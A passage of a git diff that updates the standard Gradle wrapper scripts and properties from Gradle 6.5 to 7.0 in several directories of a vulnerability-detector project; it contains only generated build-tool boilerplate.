-APP_ARGS=`save "$@"` -# Collect all arguments for the java command, following the shell quoting and substitution rules -eval set -- $DEFAULT_JVM_OPTS $JAVA_OPTS $GRADLE_OPTS "\"-Dorg.gradle.appname=$APP_BASE_NAME\"" -classpath "\"$CLASSPATH\"" org.gradle.wrapper.GradleWrapperMain "$APP_ARGS" +# Add default JVM options here. You can also use JAVA_OPTS and GRADLE_OPTS to pass JVM options to this script. +DEFAULT_JVM_OPTS='"-Xmx64m" "-Xms64m"' + +# Collect all arguments for the java command: +# * DEFAULT_JVM_OPTS, JAVA_OPTS, JAVA_OPTS, and optsEnvironmentVar are not allowed to contain shell fragments, +# and any embedded shellness will be escaped. 
+# * For example: A user cannot expect ${Hostname} to be expanded, as it is an environment variable and will be +# treated as '${Hostname}' itself on the command line. + +set -- \ + "-Dorg.gradle.appname=$APP_BASE_NAME" \ + -classpath "$CLASSPATH" \ + org.gradle.wrapper.GradleWrapperMain \ + "$@" + +# Stop when "xargs" is not available. +if ! command -v xargs >/dev/null 2>&1 +then + die "xargs is not available" +fi + +# Use "xargs" to parse quoted args. +# +# With -n1 it outputs one arg per line, with the quotes and backslashes removed. +# +# In Bash we could simply go: +# +# readarray ARGS < <( xargs -n1 <<<"$var" ) && +# set -- "${ARGS[@]}" "$@" +# +# but POSIX shell has neither arrays nor command substitution, so instead we +# post-process each arg (as a line of input to sed) to backslash-escape any +# character that might be a shell metacharacter, then use eval to reverse +# that process (while maintaining the separation between arguments), and wrap +# the whole thing up as a single "set" statement. +# +# This will of course break if any of these variables contains a newline or +# an unmatched quote. +# + +eval "set -- $( + printf '%s\n' "$DEFAULT_JVM_OPTS $JAVA_OPTS $GRADLE_OPTS" | + xargs -n1 | + sed ' s~[^-[:alnum:]+,./:=@_]~\\&~g; ' | + tr '\n' ' ' + )" '"$@"' exec "$JAVACMD" "$@" diff --git a/google/detectors/rce/cve202342793/gradlew.bat b/google/detectors/rce/cve202342793/gradlew.bat index 5093609d5..93e3f59f1 100644 --- a/google/detectors/rce/cve202342793/gradlew.bat +++ b/google/detectors/rce/cve202342793/gradlew.bat @@ -14,7 +14,7 @@ @rem limitations under the License. @rem -@if "%DEBUG%" == "" @echo off +@if "%DEBUG%"=="" @echo off @rem ########################################################################## @rem @rem Gradle startup script for Windows 
@@ -25,7 +25,8 @@ if "%OS%"=="Windows_NT" setlocal set DIRNAME=%~dp0 -if "%DIRNAME%" == "" set DIRNAME=. +if "%DIRNAME%"=="" set DIRNAME=. +@rem This is normally unused set APP_BASE_NAME=%~n0 set APP_HOME=%DIRNAME% @@ -40,7 +41,7 @@ if defined JAVA_HOME goto findJavaFromJavaHome set JAVA_EXE=java.exe %JAVA_EXE% -version >NUL 2>&1 -if "%ERRORLEVEL%" == "0" goto init +if %ERRORLEVEL% equ 0 goto execute echo. echo ERROR: JAVA_HOME is not set and no 'java' command could be found in your PATH. @@ -54,7 +55,7 @@ goto fail set JAVA_HOME=%JAVA_HOME:"=% set JAVA_EXE=%JAVA_HOME%/bin/java.exe -if exist "%JAVA_EXE%" goto init +if exist "%JAVA_EXE%" goto execute echo. echo ERROR: JAVA_HOME is set to an invalid directory: %JAVA_HOME% @@ -64,21 +65,6 @@ echo location of your Java installation. goto fail -:init -@rem Get command-line arguments, handling Windows variants - -if not "%OS%" == "Windows_NT" goto win9xME_args - -:win9xME_args -@rem Slurp the command line arguments. -set CMD_LINE_ARGS= -set _SKIP=2 - -:win9xME_args_slurp -if "x%~1" == "x" goto execute - -set CMD_LINE_ARGS=%* - :execute @rem Setup the command line 
@@ -86,17 +72,19 @@ set CLASSPATH=%APP_HOME%\gradle\wrapper\gradle-wrapper.jar @rem Execute Gradle -"%JAVA_EXE%" %DEFAULT_JVM_OPTS% %JAVA_OPTS% %GRADLE_OPTS% "-Dorg.gradle.appname=%APP_BASE_NAME%" -classpath "%CLASSPATH%" org.gradle.wrapper.GradleWrapperMain %CMD_LINE_ARGS% +"%JAVA_EXE%" %DEFAULT_JVM_OPTS% %JAVA_OPTS% %GRADLE_OPTS% "-Dorg.gradle.appname=%APP_BASE_NAME%" -classpath "%CLASSPATH%" org.gradle.wrapper.GradleWrapperMain %* :end @rem End local scope for the variables with windows NT shell -if "%ERRORLEVEL%"=="0" goto mainEnd +if %ERRORLEVEL% equ 0 goto mainEnd :fail rem Set variable GRADLE_EXIT_CONSOLE if you need the _script_ return code instead of rem the _cmd.exe /c_ return code! -if not "" == "%GRADLE_EXIT_CONSOLE%" exit 1 -exit /b 1 +set EXIT_CODE=%ERRORLEVEL% +if %EXIT_CODE% equ 0 set EXIT_CODE=1 +if not ""=="%GRADLE_EXIT_CONSOLE%" exit %EXIT_CODE% +exit /b %EXIT_CODE% :mainEnd if "%OS%"=="Windows_NT" endlocal diff --git a/google/detectors/rce/java_jmx/gradle/wrapper/gradle-wrapper.jar b/google/detectors/rce/java_jmx/gradle/wrapper/gradle-wrapper.jar index 62d4c0535..d64cd4917 100644 Binary files a/google/detectors/rce/java_jmx/gradle/wrapper/gradle-wrapper.jar and b/google/detectors/rce/java_jmx/gradle/wrapper/gradle-wrapper.jar differ diff --git a/google/detectors/rce/java_jmx/gradle/wrapper/gradle-wrapper.properties b/google/detectors/rce/java_jmx/gradle/wrapper/gradle-wrapper.properties index 622ab64a3..d04736436 100644 --- a/google/detectors/rce/java_jmx/gradle/wrapper/gradle-wrapper.properties +++ b/google/detectors/rce/java_jmx/gradle/wrapper/gradle-wrapper.properties @@ -1,5 +1,7 @@ distributionBase=GRADLE_USER_HOME distributionPath=wrapper/dists -distributionUrl=https\://services.gradle.org/distributions/gradle-6.5-bin.zip +distributionUrl=https\://services.gradle.org/distributions/gradle-7.0-bin.zip +networkTimeout=10000 +validateDistributionUrl=true zipStoreBase=GRADLE_USER_HOME zipStorePath=wrapper/dists 
diff --git a/google/detectors/rce/java_jmx/gradlew b/google/detectors/rce/java_jmx/gradlew index fbd7c5158..1aa94a426 100755 --- a/google/detectors/rce/java_jmx/gradlew +++ b/google/detectors/rce/java_jmx/gradlew @@ -1,7 +1,7 @@ -#!/usr/bin/env sh +#!/bin/sh # -# Copyright 2015 the original author or authors. +# Copyright © 2015-2021 the original authors. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. 
@@ -17,67 +17,99 @@ # ############################################################################## -## -## Gradle start up script for UN*X -## +# +# Gradle start up script for POSIX generated by Gradle. +# +# Important for running: +# +# (1) You need a POSIX-compliant shell to run this script. If your /bin/sh is +# noncompliant, but you have some other compliant shell such as ksh or +# bash, then to run this script, type that shell name before the whole +# command line, like: +# +# ksh Gradle +# +# Busybox and similar reduced shells will NOT work, because this script +# requires all of these POSIX shell features: +# * functions; +# * expansions «$var», «${var}», «${var:-default}», «${var+SET}», +# «${var#prefix}», «${var%suffix}», and «$( cmd )»; +# * compound commands having a testable exit status, especially «case»; +# * various built-in commands including «command», «set», and «ulimit». +# +# Important for patching: +# +# (2) This script targets any POSIX shell, so it avoids extensions provided +# by Bash, Ksh, etc; in particular arrays are avoided. +# +# The "traditional" practice of packing multiple parameters into a +# space-separated string is a well documented source of bugs and security +# problems, so this is (mostly) avoided, by progressively accumulating +# options in "$@", and eventually passing that to Java. +# +# Where the inherited environment variables (DEFAULT_JVM_OPTS, JAVA_OPTS, +# and GRADLE_OPTS) rely on word-splitting, this is performed explicitly; +# see the in-line comments for details. +# +# There are tweaks for specific operating systems such as AIX, CygWin, +# Darwin, MinGW, and NonStop. +# +# (3) This script is generated from the Groovy template +# https://github.com/gradle/gradle/blob/HEAD/subprojects/plugins/src/main/resources/org/gradle/api/internal/plugins/unixStartScript.txt +# within the Gradle project. +# +# You can find Gradle at https://github.com/gradle/gradle/. 
+# ############################################################################## # Attempt to set APP_HOME + # Resolve links: $0 may be a link -PRG="$0" -# Need this for relative symlinks. -while [ -h "$PRG" ] ; do - ls=`ls -ld "$PRG"` - link=`expr "$ls" : '.*-> \(.*\)$'` - if expr "$link" : '/.*' > /dev/null; then - PRG="$link" - else - PRG=`dirname "$PRG"`"/$link" - fi +app_path=$0 + +# Need this for daisy-chained symlinks. +while + APP_HOME=${app_path%"${app_path##*/}"} # leaves a trailing /; empty if no leading path + [ -h "$app_path" ] +do + ls=$( ls -ld "$app_path" ) + link=${ls#*' -> '} + case $link in #( + /*) app_path=$link ;; #( + *) app_path=$APP_HOME$link ;; + esac done -SAVED="`pwd`" -cd "`dirname \"$PRG\"`/" >/dev/null -APP_HOME="`pwd -P`" -cd "$SAVED" >/dev/null -APP_NAME="Gradle" -APP_BASE_NAME=`basename "$0"` - -# Add default JVM options here. You can also use JAVA_OPTS and GRADLE_OPTS to pass JVM options to this script. -DEFAULT_JVM_OPTS='"-Xmx64m" "-Xms64m"' +# This is normally unused +# shellcheck disable=SC2034 +APP_BASE_NAME=${0##*/} +# Discard cd standard output in case $CDPATH is set (https://github.com/gradle/gradle/issues/25036) +APP_HOME=$( cd "${APP_HOME:-./}" > /dev/null && pwd -P ) || exit # Use the maximum available, or set MAX_FD != -1 to use that value. -MAX_FD="maximum" +MAX_FD=maximum warn () { echo "$*" -} +} >&2 die () { echo echo "$*" echo exit 1 -} +} >&2 # OS specific support (must be 'true' or 'false'). cygwin=false msys=false darwin=false nonstop=false -case "`uname`" in - CYGWIN* ) - cygwin=true - ;; - Darwin* ) - darwin=true - ;; - MINGW* ) - msys=true - ;; - NONSTOP* ) - nonstop=true - ;; +case "$( uname )" in #( + CYGWIN* ) cygwin=true ;; #( + Darwin* ) darwin=true ;; #( + MSYS* | MINGW* ) msys=true ;; #( + NONSTOP* ) nonstop=true ;; esac CLASSPATH=$APP_HOME/gradle/wrapper/gradle-wrapper.jar 
@@ -87,9 +119,9 @@ CLASSPATH=$APP_HOME/gradle/wrapper/gradle-wrapper.jar if [ -n "$JAVA_HOME" ] ; then if [ -x "$JAVA_HOME/jre/sh/java" ] ; then # IBM's JDK on AIX uses strange locations for the executables - JAVACMD="$JAVA_HOME/jre/sh/java" + JAVACMD=$JAVA_HOME/jre/sh/java else - JAVACMD="$JAVA_HOME/bin/java" + JAVACMD=$JAVA_HOME/bin/java fi if [ ! -x "$JAVACMD" ] ; then die "ERROR: JAVA_HOME is set to an invalid directory: $JAVA_HOME 
@@ -98,88 +130,120 @@ Please set the JAVA_HOME variable in your environment to match the location of your Java installation." fi else - JAVACMD="java" - which java >/dev/null 2>&1 || die "ERROR: JAVA_HOME is not set and no 'java' command could be found in your PATH. + JAVACMD=java + if ! command -v java >/dev/null 2>&1 + then + die "ERROR: JAVA_HOME is not set and no 'java' command could be found in your PATH. Please set the JAVA_HOME variable in your environment to match the location of your Java installation." + fi fi # Increase the maximum file descriptors if we can. -if [ "$cygwin" = "false" -a "$darwin" = "false" -a "$nonstop" = "false" ] ; then - MAX_FD_LIMIT=`ulimit -H -n` - if [ $? -eq 0 ] ; then - if [ "$MAX_FD" = "maximum" -o "$MAX_FD" = "max" ] ; then - MAX_FD="$MAX_FD_LIMIT" - fi - ulimit -n $MAX_FD - if [ $? -ne 0 ] ; then - warn "Could not set maximum file descriptor limit: $MAX_FD" - fi - else - warn "Could not query maximum file descriptor limit: $MAX_FD_LIMIT" - fi +if ! "$cygwin" && ! "$darwin" && ! "$nonstop" ; then + case $MAX_FD in #( + max*) + # In POSIX sh, ulimit -H is undefined. That's why the result is checked to see if it worked. + # shellcheck disable=SC2039,SC3045 + MAX_FD=$( ulimit -H -n ) || + warn "Could not query maximum file descriptor limit" + esac + case $MAX_FD in #( + '' | soft) :;; #( + *) + # In POSIX sh, ulimit -n is undefined. That's why the result is checked to see if it worked. 
+ # shellcheck disable=SC2039,SC3045 + ulimit -n "$MAX_FD" || + warn "Could not set maximum file descriptor limit to $MAX_FD" + esac fi -# For Darwin, add options to specify how the application appears in the dock -if $darwin; then - GRADLE_OPTS="$GRADLE_OPTS \"-Xdock:name=$APP_NAME\" \"-Xdock:icon=$APP_HOME/media/gradle.icns\"" -fi +# Collect all arguments for the java command, stacking in reverse order: +# * args from the command line +# * the main class name +# * -classpath +# * -D...appname settings +# * --module-path (only if needed) +# * DEFAULT_JVM_OPTS, JAVA_OPTS, and GRADLE_OPTS environment variables. # For Cygwin or MSYS, switch paths to Windows format before running java -if [ "$cygwin" = "true" -o "$msys" = "true" ] ; then - APP_HOME=`cygpath --path --mixed "$APP_HOME"` - CLASSPATH=`cygpath --path --mixed "$CLASSPATH"` - - JAVACMD=`cygpath --unix "$JAVACMD"` - - # We build the pattern for arguments to be converted via cygpath - ROOTDIRSRAW=`find -L / -maxdepth 1 -mindepth 1 -type d 2>/dev/null` - SEP="" - for dir in $ROOTDIRSRAW ; do - ROOTDIRS="$ROOTDIRS$SEP$dir" - SEP="|" - done - OURCYGPATTERN="(^($ROOTDIRS))" - # Add a user-defined pattern to the cygpath arguments - if [ "$GRADLE_CYGPATTERN" != "" ] ; then - OURCYGPATTERN="$OURCYGPATTERN|($GRADLE_CYGPATTERN)" - fi +if "$cygwin" || "$msys" ; then + APP_HOME=$( cygpath --path --mixed "$APP_HOME" ) + CLASSPATH=$( cygpath --path --mixed "$CLASSPATH" ) + + JAVACMD=$( cygpath --unix "$JAVACMD" ) + # Now convert the arguments - kludge to limit ourselves to /bin/sh - i=0 - for arg in "$@" ; do - CHECK=`echo "$arg"|egrep -c "$OURCYGPATTERN" -` - CHECK2=`echo "$arg"|egrep -c "^-"` ### Determine if an option - - if [ $CHECK -ne 0 ] && [ $CHECK2 -eq 0 ] ; then ### Added a condition - eval `echo args$i`=`cygpath --path --ignore --mixed "$arg"` - else - eval `echo args$i`="\"$arg\"" + for arg do + if + case $arg in #( + -*) false ;; # don't mess with options #( + /?*) t=${arg#/} t=/${t%%/*} # looks like a POSIX 
filepath + [ -e "$t" ] ;; #( + *) false ;; + esac + then + arg=$( cygpath --path --ignore --mixed "$arg" ) fi - i=`expr $i + 1` + # Roll the args list around exactly as many times as the number of + # args, so each arg winds up back in the position where it started, but + # possibly modified. + # + # NB: a `for` loop captures its iteration list before it begins, so + # changing the positional parameters here affects neither the number of + # iterations, nor the values presented in `arg`. + shift # remove old arg + set -- "$@" "$arg" # push replacement arg done - case $i in - 0) set -- ;; - 1) set -- "$args0" ;; - 2) set -- "$args0" "$args1" ;; - 3) set -- "$args0" "$args1" "$args2" ;; - 4) set -- "$args0" "$args1" "$args2" "$args3" ;; - 5) set -- "$args0" "$args1" "$args2" "$args3" "$args4" ;; - 6) set -- "$args0" "$args1" "$args2" "$args3" "$args4" "$args5" ;; - 7) set -- "$args0" "$args1" "$args2" "$args3" "$args4" "$args5" "$args6" ;; - 8) set -- "$args0" "$args1" "$args2" "$args3" "$args4" "$args5" "$args6" "$args7" ;; - 9) set -- "$args0" "$args1" "$args2" "$args3" "$args4" "$args5" "$args6" "$args7" "$args8" ;; - esac fi -# Escape application args -save () { - for i do printf %s\\n "$i" | sed "s/'/'\\\\''/g;1s/^/'/;\$s/\$/' \\\\/" ; done - echo " " -} -APP_ARGS=`save "$@"` -# Collect all arguments for the java command, following the shell quoting and substitution rules -eval set -- $DEFAULT_JVM_OPTS $JAVA_OPTS $GRADLE_OPTS "\"-Dorg.gradle.appname=$APP_BASE_NAME\"" -classpath "\"$CLASSPATH\"" org.gradle.wrapper.GradleWrapperMain "$APP_ARGS" +# Add default JVM options here. You can also use JAVA_OPTS and GRADLE_OPTS to pass JVM options to this script. +DEFAULT_JVM_OPTS='"-Xmx64m" "-Xms64m"' + +# Collect all arguments for the java command: +# * DEFAULT_JVM_OPTS, JAVA_OPTS, JAVA_OPTS, and optsEnvironmentVar are not allowed to contain shell fragments, +# and any embedded shellness will be escaped. 
+# * For example: A user cannot expect ${Hostname} to be expanded, as it is an environment variable and will be +# treated as '${Hostname}' itself on the command line. + +set -- \ + "-Dorg.gradle.appname=$APP_BASE_NAME" \ + -classpath "$CLASSPATH" \ + org.gradle.wrapper.GradleWrapperMain \ + "$@" + +# Stop when "xargs" is not available. +if ! command -v xargs >/dev/null 2>&1 +then + die "xargs is not available" +fi + +# Use "xargs" to parse quoted args. +# +# With -n1 it outputs one arg per line, with the quotes and backslashes removed. +# +# In Bash we could simply go: +# +# readarray ARGS < <( xargs -n1 <<<"$var" ) && +# set -- "${ARGS[@]}" "$@" +# +# but POSIX shell has neither arrays nor command substitution, so instead we +# post-process each arg (as a line of input to sed) to backslash-escape any +# character that might be a shell metacharacter, then use eval to reverse +# that process (while maintaining the separation between arguments), and wrap +# the whole thing up as a single "set" statement. +# +# This will of course break if any of these variables contains a newline or +# an unmatched quote. +# + +eval "set -- $( + printf '%s\n' "$DEFAULT_JVM_OPTS $JAVA_OPTS $GRADLE_OPTS" | + xargs -n1 | + sed ' s~[^-[:alnum:]+,./:=@_]~\\&~g; ' | + tr '\n' ' ' + )" '"$@"' exec "$JAVACMD" "$@" diff --git a/google/detectors/rce/java_jmx/gradlew.bat b/google/detectors/rce/java_jmx/gradlew.bat index 5093609d5..93e3f59f1 100644 --- a/google/detectors/rce/java_jmx/gradlew.bat +++ b/google/detectors/rce/java_jmx/gradlew.bat @@ -14,7 +14,7 @@ @rem limitations under the License. @rem -@if "%DEBUG%" == "" @echo off +@if "%DEBUG%"=="" @echo off @rem ########################################################################## @rem @rem Gradle startup script for Windows @@ -25,7 +25,8 @@ if "%OS%"=="Windows_NT" setlocal set DIRNAME=%~dp0 -if "%DIRNAME%" == "" set DIRNAME=. +if "%DIRNAME%"=="" set DIRNAME=. +@rem This is normally unused set APP_BASE_NAME=%~n0 set APP_HOME=%DIRNAME% 
@@ -40,7 +41,7 @@ if defined JAVA_HOME goto findJavaFromJavaHome set JAVA_EXE=java.exe %JAVA_EXE% -version >NUL 2>&1 -if "%ERRORLEVEL%" == "0" goto init +if %ERRORLEVEL% equ 0 goto execute echo. echo ERROR: JAVA_HOME is not set and no 'java' command could be found in your PATH. @@ -54,7 +55,7 @@ goto fail set JAVA_HOME=%JAVA_HOME:"=% set JAVA_EXE=%JAVA_HOME%/bin/java.exe -if exist "%JAVA_EXE%" goto init +if exist "%JAVA_EXE%" goto execute echo. echo ERROR: JAVA_HOME is set to an invalid directory: %JAVA_HOME% @@ -64,21 +65,6 @@ echo location of your Java installation. goto fail -:init -@rem Get command-line arguments, handling Windows variants - -if not "%OS%" == "Windows_NT" goto win9xME_args - -:win9xME_args -@rem Slurp the command line arguments. -set CMD_LINE_ARGS= -set _SKIP=2 - -:win9xME_args_slurp -if "x%~1" == "x" goto execute - -set CMD_LINE_ARGS=%* - :execute @rem Setup the command line @@ -86,17 +72,19 @@ set CLASSPATH=%APP_HOME%\gradle\wrapper\gradle-wrapper.jar @rem Execute Gradle -"%JAVA_EXE%" %DEFAULT_JVM_OPTS% %JAVA_OPTS% %GRADLE_OPTS% "-Dorg.gradle.appname=%APP_BASE_NAME%" -classpath "%CLASSPATH%" org.gradle.wrapper.GradleWrapperMain %CMD_LINE_ARGS% +"%JAVA_EXE%" %DEFAULT_JVM_OPTS% %JAVA_OPTS% %GRADLE_OPTS% "-Dorg.gradle.appname=%APP_BASE_NAME%" -classpath "%CLASSPATH%" org.gradle.wrapper.GradleWrapperMain %* :end @rem End local scope for the variables with windows NT shell -if "%ERRORLEVEL%"=="0" goto mainEnd +if %ERRORLEVEL% equ 0 goto mainEnd :fail rem Set variable GRADLE_EXIT_CONSOLE if you need the _script_ return code instead of rem the _cmd.exe /c_ return code! -if not "" == "%GRADLE_EXIT_CONSOLE%" exit 1 -exit /b 1 +set EXIT_CODE=%ERRORLEVEL% +if %EXIT_CODE% equ 0 set EXIT_CODE=1 +if not ""=="%GRADLE_EXIT_CONSOLE%" exit %EXIT_CODE% +exit /b %EXIT_CODE% :mainEnd if "%OS%"=="Windows_NT" endlocal 
diff --git a/google/detectors/rce/joomla/cve20158562/gradle/wrapper/gradle-wrapper.jar b/google/detectors/rce/joomla/cve20158562/gradle/wrapper/gradle-wrapper.jar index 62d4c0535..d64cd4917 100644 Binary files a/google/detectors/rce/joomla/cve20158562/gradle/wrapper/gradle-wrapper.jar and b/google/detectors/rce/joomla/cve20158562/gradle/wrapper/gradle-wrapper.jar differ diff --git a/google/detectors/rce/joomla/cve20158562/gradle/wrapper/gradle-wrapper.properties b/google/detectors/rce/joomla/cve20158562/gradle/wrapper/gradle-wrapper.properties index 622ab64a3..d04736436 100644 --- a/google/detectors/rce/joomla/cve20158562/gradle/wrapper/gradle-wrapper.properties +++ b/google/detectors/rce/joomla/cve20158562/gradle/wrapper/gradle-wrapper.properties @@ -1,5 +1,7 @@ distributionBase=GRADLE_USER_HOME distributionPath=wrapper/dists -distributionUrl=https\://services.gradle.org/distributions/gradle-6.5-bin.zip +distributionUrl=https\://services.gradle.org/distributions/gradle-7.0-bin.zip +networkTimeout=10000 +validateDistributionUrl=true zipStoreBase=GRADLE_USER_HOME zipStorePath=wrapper/dists diff --git a/google/detectors/rce/joomla/cve20158562/gradlew b/google/detectors/rce/joomla/cve20158562/gradlew index fbd7c5158..1aa94a426 100755 --- a/google/detectors/rce/joomla/cve20158562/gradlew +++ b/google/detectors/rce/joomla/cve20158562/gradlew @@ -1,7 +1,7 @@ -#!/usr/bin/env sh +#!/bin/sh # -# Copyright 2015 the original author or authors. +# Copyright © 2015-2021 the original authors. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. 
@@ -17,67 +17,99 @@ # ############################################################################## -## -## Gradle start up script for UN*X -## +# +# Gradle start up script for POSIX generated by Gradle. +# +# Important for running: +# +# (1) You need a POSIX-compliant shell to run this script. If your /bin/sh is +# noncompliant, but you have some other compliant shell such as ksh or +# bash, then to run this script, type that shell name before the whole +# command line, like: +# +# ksh Gradle +# +# Busybox and similar reduced shells will NOT work, because this script +# requires all of these POSIX shell features: +# * functions; +# * expansions «$var», «${var}», «${var:-default}», «${var+SET}», +# «${var#prefix}», «${var%suffix}», and «$( cmd )»; +# * compound commands having a testable exit status, especially «case»; +# * various built-in commands including «command», «set», and «ulimit». +# +# Important for patching: +# +# (2) This script targets any POSIX shell, so it avoids extensions provided +# by Bash, Ksh, etc; in particular arrays are avoided. +# +# The "traditional" practice of packing multiple parameters into a +# space-separated string is a well documented source of bugs and security +# problems, so this is (mostly) avoided, by progressively accumulating +# options in "$@", and eventually passing that to Java. +# +# Where the inherited environment variables (DEFAULT_JVM_OPTS, JAVA_OPTS, +# and GRADLE_OPTS) rely on word-splitting, this is performed explicitly; +# see the in-line comments for details. +# +# There are tweaks for specific operating systems such as AIX, CygWin, +# Darwin, MinGW, and NonStop. +# +# (3) This script is generated from the Groovy template +# https://github.com/gradle/gradle/blob/HEAD/subprojects/plugins/src/main/resources/org/gradle/api/internal/plugins/unixStartScript.txt +# within the Gradle project. +# +# You can find Gradle at https://github.com/gradle/gradle/. 
+# ############################################################################## # Attempt to set APP_HOME + # Resolve links: $0 may be a link -PRG="$0" -# Need this for relative symlinks. -while [ -h "$PRG" ] ; do - ls=`ls -ld "$PRG"` - link=`expr "$ls" : '.*-> \(.*\)$'` - if expr "$link" : '/.*' > /dev/null; then - PRG="$link" - else - PRG=`dirname "$PRG"`"/$link" - fi +app_path=$0 + +# Need this for daisy-chained symlinks. +while + APP_HOME=${app_path%"${app_path##*/}"} # leaves a trailing /; empty if no leading path + [ -h "$app_path" ] +do + ls=$( ls -ld "$app_path" ) + link=${ls#*' -> '} + case $link in #( + /*) app_path=$link ;; #( + *) app_path=$APP_HOME$link ;; + esac done -SAVED="`pwd`" -cd "`dirname \"$PRG\"`/" >/dev/null -APP_HOME="`pwd -P`" -cd "$SAVED" >/dev/null -APP_NAME="Gradle" -APP_BASE_NAME=`basename "$0"` - -# Add default JVM options here. You can also use JAVA_OPTS and GRADLE_OPTS to pass JVM options to this script. -DEFAULT_JVM_OPTS='"-Xmx64m" "-Xms64m"' +# This is normally unused +# shellcheck disable=SC2034 +APP_BASE_NAME=${0##*/} +# Discard cd standard output in case $CDPATH is set (https://github.com/gradle/gradle/issues/25036) +APP_HOME=$( cd "${APP_HOME:-./}" > /dev/null && pwd -P ) || exit # Use the maximum available, or set MAX_FD != -1 to use that value. -MAX_FD="maximum" +MAX_FD=maximum warn () { echo "$*" -} +} >&2 die () { echo echo "$*" echo exit 1 -} +} >&2 # OS specific support (must be 'true' or 'false'). cygwin=false msys=false darwin=false nonstop=false -case "`uname`" in - CYGWIN* ) - cygwin=true - ;; - Darwin* ) - darwin=true - ;; - MINGW* ) - msys=true - ;; - NONSTOP* ) - nonstop=true - ;; +case "$( uname )" in #( + CYGWIN* ) cygwin=true ;; #( + Darwin* ) darwin=true ;; #( + MSYS* | MINGW* ) msys=true ;; #( + NONSTOP* ) nonstop=true ;; esac CLASSPATH=$APP_HOME/gradle/wrapper/gradle-wrapper.jar 
@@ -87,9 +119,9 @@ CLASSPATH=$APP_HOME/gradle/wrapper/gradle-wrapper.jar if [ -n "$JAVA_HOME" ] ; then if [ -x "$JAVA_HOME/jre/sh/java" ] ; then # IBM's JDK on AIX uses strange locations for the executables - JAVACMD="$JAVA_HOME/jre/sh/java" + JAVACMD=$JAVA_HOME/jre/sh/java else - JAVACMD="$JAVA_HOME/bin/java" + JAVACMD=$JAVA_HOME/bin/java fi if [ ! -x "$JAVACMD" ] ; then die "ERROR: JAVA_HOME is set to an invalid directory: $JAVA_HOME 
@@ -98,88 +130,120 @@ Please set the JAVA_HOME variable in your environment to match the location of your Java installation." fi else - JAVACMD="java" - which java >/dev/null 2>&1 || die "ERROR: JAVA_HOME is not set and no 'java' command could be found in your PATH. + JAVACMD=java + if ! command -v java >/dev/null 2>&1 + then + die "ERROR: JAVA_HOME is not set and no 'java' command could be found in your PATH. Please set the JAVA_HOME variable in your environment to match the location of your Java installation." + fi fi # Increase the maximum file descriptors if we can. -if [ "$cygwin" = "false" -a "$darwin" = "false" -a "$nonstop" = "false" ] ; then - MAX_FD_LIMIT=`ulimit -H -n` - if [ $? -eq 0 ] ; then - if [ "$MAX_FD" = "maximum" -o "$MAX_FD" = "max" ] ; then - MAX_FD="$MAX_FD_LIMIT" - fi - ulimit -n $MAX_FD - if [ $? -ne 0 ] ; then - warn "Could not set maximum file descriptor limit: $MAX_FD" - fi - else - warn "Could not query maximum file descriptor limit: $MAX_FD_LIMIT" - fi +if ! "$cygwin" && ! "$darwin" && ! "$nonstop" ; then + case $MAX_FD in #( + max*) + # In POSIX sh, ulimit -H is undefined. That's why the result is checked to see if it worked. + # shellcheck disable=SC2039,SC3045 + MAX_FD=$( ulimit -H -n ) || + warn "Could not query maximum file descriptor limit" + esac + case $MAX_FD in #( + '' | soft) :;; #( + *) + # In POSIX sh, ulimit -n is undefined. That's why the result is checked to see if it worked. 
+ # shellcheck disable=SC2039,SC3045 + ulimit -n "$MAX_FD" || + warn "Could not set maximum file descriptor limit to $MAX_FD" + esac fi -# For Darwin, add options to specify how the application appears in the dock -if $darwin; then - GRADLE_OPTS="$GRADLE_OPTS \"-Xdock:name=$APP_NAME\" \"-Xdock:icon=$APP_HOME/media/gradle.icns\"" -fi +# Collect all arguments for the java command, stacking in reverse order: +# * args from the command line +# * the main class name +# * -classpath +# * -D...appname settings +# * --module-path (only if needed) +# * DEFAULT_JVM_OPTS, JAVA_OPTS, and GRADLE_OPTS environment variables. # For Cygwin or MSYS, switch paths to Windows format before running java -if [ "$cygwin" = "true" -o "$msys" = "true" ] ; then - APP_HOME=`cygpath --path --mixed "$APP_HOME"` - CLASSPATH=`cygpath --path --mixed "$CLASSPATH"` - - JAVACMD=`cygpath --unix "$JAVACMD"` - - # We build the pattern for arguments to be converted via cygpath - ROOTDIRSRAW=`find -L / -maxdepth 1 -mindepth 1 -type d 2>/dev/null` - SEP="" - for dir in $ROOTDIRSRAW ; do - ROOTDIRS="$ROOTDIRS$SEP$dir" - SEP="|" - done - OURCYGPATTERN="(^($ROOTDIRS))" - # Add a user-defined pattern to the cygpath arguments - if [ "$GRADLE_CYGPATTERN" != "" ] ; then - OURCYGPATTERN="$OURCYGPATTERN|($GRADLE_CYGPATTERN)" - fi +if "$cygwin" || "$msys" ; then + APP_HOME=$( cygpath --path --mixed "$APP_HOME" ) + CLASSPATH=$( cygpath --path --mixed "$CLASSPATH" ) + + JAVACMD=$( cygpath --unix "$JAVACMD" ) + # Now convert the arguments - kludge to limit ourselves to /bin/sh - i=0 - for arg in "$@" ; do - CHECK=`echo "$arg"|egrep -c "$OURCYGPATTERN" -` - CHECK2=`echo "$arg"|egrep -c "^-"` ### Determine if an option - - if [ $CHECK -ne 0 ] && [ $CHECK2 -eq 0 ] ; then ### Added a condition - eval `echo args$i`=`cygpath --path --ignore --mixed "$arg"` - else - eval `echo args$i`="\"$arg\"" + for arg do + if + case $arg in #( + -*) false ;; # don't mess with options #( + /?*) t=${arg#/} t=/${t%%/*} # looks like a POSIX 
filepath + [ -e "$t" ] ;; #( + *) false ;; + esac + then + arg=$( cygpath --path --ignore --mixed "$arg" ) fi - i=`expr $i + 1` + # Roll the args list around exactly as many times as the number of + # args, so each arg winds up back in the position where it started, but + # possibly modified. + # + # NB: a `for` loop captures its iteration list before it begins, so + # changing the positional parameters here affects neither the number of + # iterations, nor the values presented in `arg`. + shift # remove old arg + set -- "$@" "$arg" # push replacement arg done - case $i in - 0) set -- ;; - 1) set -- "$args0" ;; - 2) set -- "$args0" "$args1" ;; - 3) set -- "$args0" "$args1" "$args2" ;; - 4) set -- "$args0" "$args1" "$args2" "$args3" ;; - 5) set -- "$args0" "$args1" "$args2" "$args3" "$args4" ;; - 6) set -- "$args0" "$args1" "$args2" "$args3" "$args4" "$args5" ;; - 7) set -- "$args0" "$args1" "$args2" "$args3" "$args4" "$args5" "$args6" ;; - 8) set -- "$args0" "$args1" "$args2" "$args3" "$args4" "$args5" "$args6" "$args7" ;; - 9) set 